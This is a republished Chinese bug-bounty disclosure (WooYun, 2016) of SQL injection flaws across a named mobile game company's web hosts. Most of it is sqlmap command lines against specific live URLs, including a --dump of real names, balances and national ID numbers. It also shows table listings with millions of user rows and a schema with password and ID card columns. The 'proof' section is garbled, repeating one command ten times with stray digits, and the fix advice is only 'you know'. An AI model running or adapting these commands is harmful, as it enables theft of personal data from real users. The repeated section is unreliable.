神刀安全网

漏洞标题: 游戏安全之某手游网SQL注入打包可垮裤查询(涉及百万用户信息)

漏洞详情

披露状态:

2016-04-09: 细节已通知厂商并且等待厂商处理中
2016-04-09: 厂商已经确认,细节仅向厂商公开
2016-04-19: 细节向核心白帽子及相关领域专家公开
2016-04-29: 细节向普通白帽子公开
2016-05-09: 细节向实习白帽子公开
2016-05-24: 细节向公众公开

简要描述:

RT

详细说明:

code 区域
分站POST注入:E:/sqlmap>sqlmap.py -u "http://cms.caohua.com/Member/Register.aspx" --data "__ha
sh__=QZKMhJ1pv8RhKGxQvSBk9RWXBes%2Bi23q%2FWF3%2BODYAlA%3D&__action__=jvXQDpVsgMF
rewgNVdPG1X5DJ2nGcGtHt5dvuyNhp6s%3D&txtLoginPass=88952634&txtLoginPass_2=8895263
4&txtQQ=88952634&txtCheckNum=88952634&txtUserName=88952634" -D MobPlatform -T Da
ta_UserAccount -C "RealName,CountMoney,IDCard" --dump

———————————-

code 区域
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
4" --current-db

—————————-

code 区域
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/soulb" --data "packcent=88952634"
--dbs

——————————-

code 区域
E:/sqlmap>sqlmap.py -u "http://admin.caohua.com/Web/Member/Member.ashx?m=isRepea
t&UserName=" --dbs

——————————

code 区域
E:/sqlmap>sqlmap.py -u "http://activity.caohua.com/MarchSKAjax/AjaxIndex.ashx?m=
GetQuery&uid=1" --dbs

—————————–

code 区域
E:/sqlmap>sqlmap.py -u "http://wap.caohua.com/Web/Game/GameList/BSearchGame.ashx
?Content=" --dbs

10个裤 都可以查询

漏洞标题:  游戏安全之某手游网SQL注入打包可垮裤查询(涉及百万用户信息)

数据库:MobPlatform

code 区域
Database: MobPlatform
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| dbo.Data_ProDownLoad | 6415950 |
| dbo.Data_CallBackError | 6067433 |
| dbo.Data_ProCPA | 5775310 |
| dbo.Data_ProductUsers | 5586541 |
| dbo.ExtData_SourcePlanTotalCount | 1663380 |
| dbo.Data_UserAccount | 1388708 |
| dbo.ExtData_UserPlanTotalCount | 1333119 |
| dbo.Data_ProductOrder | 1230833 |
| dbo.Data_ProCPS | 1151720 |
| dbo.Data_ProductGift | 1107720 |
| dbo.ExtData_SourceTotalCount | 1070893 |
| dbo.Data_SourcePlanTotalCount | 976886 |
| dbo.Data_ProLogin | 840158 |
| dbo.Data_UserPlanTotalCount | 654747 |
| dbo.ExtData_PlanTotalCount | 587222 |
| dbo.ExtData_ProductTotalCount | 485816 |
| dbo.Data_PlanTotalCount | 323250 |
| dbo.Data_SourceTotalCount | 145167 |
| dbo.Data_UserTotalCount | 84706 |
| dbo.Base_SourceAPKInfo | 52370 |
| dbo.Data_UserPayOrder | 33938 |
| dbo.Data_ProductTotalCount | 26426 |
| dbo.Base_Server | 18644 |
| dbo.Base_UserAdvertPlan | 14106 |
| dbo.Data_GiftCheck | 10178 |
| dbo.Data_SourceMoneyToMember | 9592 |
| dbo.Data_UserBillRecords | 6312 |
| dbo.Base_SourceAdvertPlan | 5660 |
| dbo.MS_Menu_Role | 3902 |
| dbo.Data_UserSecret | 3583 |
| dbo.PS_SiteData | 3523 |
| dbo.Base_DrawOrders | 3448 |
| dbo.Base_UserSource | 2614 |
| dbo.Base_UserAccount | 2232 |
| dbo.Base_UserInfo | 2214 |
| dbo.Base_UserPersonal | 1162 |
| dbo.Data_MSDKPayOrders | 1118 |
| dbo.Base_UserBankInfo | 1044 |
| dbo.Base_ProductGift | 513 |
| dbo.Base_SourceHtml | 469 |
| dbo.Base_UserCompany | 382 |
| dbo.PS_Mixed | 309 |
| dbo.Base_AdvertPlan | 227 |
| dbo.MSreplication_objects | 219 |
| dbo.Data_SourceChargeApply | 175 |
| dbo.Base_ProductInfo | 169 |
| dbo.MS_Manager_Role | 89 |
| dbo.MS_Manager_Role | 89 |
| dbo.BBS_Topic | 57 |
| dbo.PS_ArticleClass | 53 |
| dbo.PS_ArticleClass | 53 |
| dbo.MS_Role | 48 |
| dbo.Data_UserMoneyInsertPost | 44 |
| dbo.PS_AdsClass | 23 |
| dbo.PS_AdsClass | 23 |
| dbo.MS_Dept | 18 |
| dbo.PS_Payment | 16 |
| dbo.Base_Corner | 14 |
| dbo.Base_ProductArticle | 7 |
| dbo.SDK_Class | 5 |
| dbo.Base_PackServer | 4 |
| dbo.Data_ArticleClass | 2 |
| dbo.Data_ProductInfo | 2 |
| dbo.CN_Menu | 1 |
| dbo.MS_Config | 1 |
| dbo.MSreplication_subscriptions | 1 |
| dbo.MSsubscription_agents | 1 |
+----------------------------------+---------+

数据库:MobUsers_DB

code 区域
Database: MobUsers_DB
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| dbo.Data_UserAccount | 5701357 |
+----------------------+---------+

数据库:MobGame_DB

code 区域
Database: MobGame_DB
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| dbo.Re_OldUser | 4916892 |
| dbo.Ur_WalletLog | 2647587 |
| dbo.Ur_DoWork | 1610735 |
| dbo.SC_GetLog | 1497556 |
| dbo.SC_TaskLog | 1497556 |
| dbo.Us_Info | 1374572 |
| dbo.Ge_GiftCode | 1002609 |
| dbo.Ge_GiftCode | 1002609 |
| dbo.Data_CallBackError | 632818 |
| dbo.AC_Player | 316155 |
| dbo.CH_SignLog | 243104 |
| dbo.AC_FinshRole | 236807 |
| dbo.Or_PayOrder | 182786 |
| dbo.Or_GameOrder | 161090 |
| dbo.CH_RewardLog | 52355 |
| dbo.SG_SignLog | 49922 |
| dbo.HP_Integral | 38682 |
| dbo.CH_Player | 32054 |
| dbo.NY_SignLog | 30008 |
| dbo.SI_Info | 27695 |
| dbo.HP_ISDonate | 26467 |
| dbo.CH_GetLog | 23399 |
| dbo.SG_GetLog | 22206 |
| dbo.HL_GetLog | 19799 |
| dbo.HL_DrawLog | 19014 |
| dbo.CH_Order | 15963 |
| dbo.NY_Blessing | 13916 |
| dbo.SI_Player | 13011 |
| dbo.SK_GrabLog | 12175 |
| dbo.SI_GiftLog | 10525 |
| dbo.NY_Player | 9888 |
| dbo.SG_Player | 9452 |
| dbo.RP_GetLog | 8559 |
| dbo.AC_Receive | 7889 |
| dbo.AC_Rotary | 7889 |
| dbo.RP_Player | 5868 |
| dbo.SK_GetLog | 5501 |
| dbo.NY_PayOrder | 4339 |
| dbo.SK_Player | 3954 |
| dbo.PS_SiteData | 3523 |
| dbo.Us_Wallet | 3511 |
| dbo.MK_Order | 3246 |
| dbo.HL_Player | 2916 |
| dbo.Re_Order | 2681 |
| dbo.SI_UserRole | 2550 |
| dbo.NY_ClockLog | 2089 |
| dbo.RP_Order | 1933 |
| dbo.MS_Menu_Role | 1915 |
| dbo.MK_GetLog | 1854 |
| dbo.HL_ExchangeGiftCode | 1804 |
| dbo.HL_ExchangeGiftCode | 1804 |
| dbo.MK_Player | 988 |
| dbo.MSreplication_objects | 303 |
| dbo.Ge_Info | 119 |
| dbo.SK_Gift | 96 |
| dbo.Ur_Work | 92 |
| dbo.PM_Order | 71 |
| dbo.MS_Manager_Role | 42 |
| dbo.MS_Manager_Role | 42 |
| dbo.SC_PlayerPlace | 34 |
| dbo.SC_PlayerPlace | 34 |
| dbo.PS_ArticleClass | 22 |
| dbo.PS_ArticleClass | 22 |
| dbo.PS_AdsClass | 19 |
| dbo.PS_AdsClass | 19 |
| dbo.PS_Mixed | 18 |
| dbo.AC_Prize | 17 |
| dbo.SG_Gift | 15 |
| dbo.SK_TimeField | 15 |
| dbo.HL_Gift | 13 |
| dbo.MS_Role | 12 |
| dbo.SC_Scratch | 11 |
| dbo.AC_Gift | 10 |
| dbo.CH_Gift | 10 |
| dbo.MR_Rank | 10 |
| dbo.PS_Payment | 10 |
| dbo.SI_Gitf | 10 |
| dbo.MK_Rebate | 8 |
| dbo.RP_Gift | 8 |
| dbo.SC_Gift | 8 |
| dbo.System_Configs | 8 |
| dbo.MS_Dept | 7 |
| dbo.NY_Gift | 7 |
| dbo.PM_Product | 5 |
| dbo.Ms_Config | 4 |
| dbo.Re_Info | 4 |
| dbo.SK_Seckill | 4 |
| dbo.Data_Discount | 3 |
| dbo.AC_Role | 2 |
| dbo.HL_Turntable | 2 |
| dbo.RP_TimeField | 2 |
| dbo.SG_Role | 2 |
| dbo.CH_Role | 1 |
| dbo.HP_Donate | 1 |
| dbo.MK_Role | 1 |
| dbo.MSreplication_subscriptions | 1 |
| dbo.MSsubscription_agents | 1 |
| dbo.NY_NewYear | 1 |
| dbo.RP_RedPackets | 1 |
| dbo.SI_Role | 1 |
+---------------------------------+---------+

这个裤还有可以整出论坛的

code 区域
Database: MobGame_DB
Table: Us_Info
[19 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| Active | int |
| AddDateTime | datetime |
| BBSPwd | varchar |
| Birthday | datetime |
| Email | varchar |
| GiveMoney | decimal |
| IDCard | varchar |
| Install | int |
| LoginName | varchar |
| NickName | varchar |
| Password | varchar |
| Pay | decimal |
| QQ | varchar |
| Rank_ID | int |
| RealName | varchar |
| Status | char |
| Tel | varchar |
| Token | varchar |
| UpdateDateTime | datetime |
+----------------+----------+

跑了几个数据量大的 还有几个就不一一演示了

漏洞证明:

code 区域
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
4" --current-db

0

———————————-

code 区域
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
4" --current-db

1

—————————-

code 区域
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
4" --current-db

2

——————————-

code 区域
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
4" --current-db

3

——————————

code 区域
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
4" --current-db

4

—————————–

code 区域
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
4" --current-db

5

10个裤 都可以查询

漏洞标题:  游戏安全之某手游网SQL注入打包可垮裤查询(涉及百万用户信息)

数据库:MobPlatform

code 区域
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
4" --current-db

6

数据库:MobUsers_DB

code 区域
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
4" --current-db

7

数据库:MobGame_DB

code 区域
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
4" --current-db

8

这个裤还有可以整出论坛的

code 区域
主站POST注入:E:/sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263
4" --current-db

9

跑了几个数据量大的 还有几个就不一一演示了

修复方案:

你懂的

版权声明:转载请注明来源 黑色键盘丶@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 游戏安全之某手游网SQL注入打包可垮裤查询(涉及百万用户信息)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址